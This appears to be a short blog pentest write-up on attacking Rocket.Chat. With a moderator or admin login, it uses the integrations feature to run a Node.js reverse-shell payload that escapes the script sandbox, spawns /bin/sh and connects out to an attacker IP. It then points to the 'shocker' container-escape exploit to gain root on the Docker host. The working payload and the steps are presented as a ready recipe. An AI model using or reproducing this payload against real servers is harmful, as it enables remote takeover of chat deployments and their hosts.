hosting image

Pentest Rocket Chat RCE + docker VM PoC read any root file (PRIV esc) shocker

affected script is Rocket Chat

official site : https://rocket.chat/

 

Situation :

  • log in as mod or admin.

after login in go to INTEGRATION 

 

 

choose the active channel ( my case was GENERAL  )

 

 

add  a js code for reverse shell 

 

const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"), 
cp = require("child_process"), 
sh = cp.spawn("/bin/sh", []); 
var client = new net.Socket(); 
client.connect(1234, "XX.XX.XX.XX", function()
{ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); });

 

activate netcat on the same port and curl the webhook !

and volla, we got reverse shell !



using the following p0c with small edits was able to get root priv

http://stealth.openwall.net/xSports/shocker.c

 

compile it locally and upload it




and yea we got the root ~!

Leave a Reply

Your email address will not be published.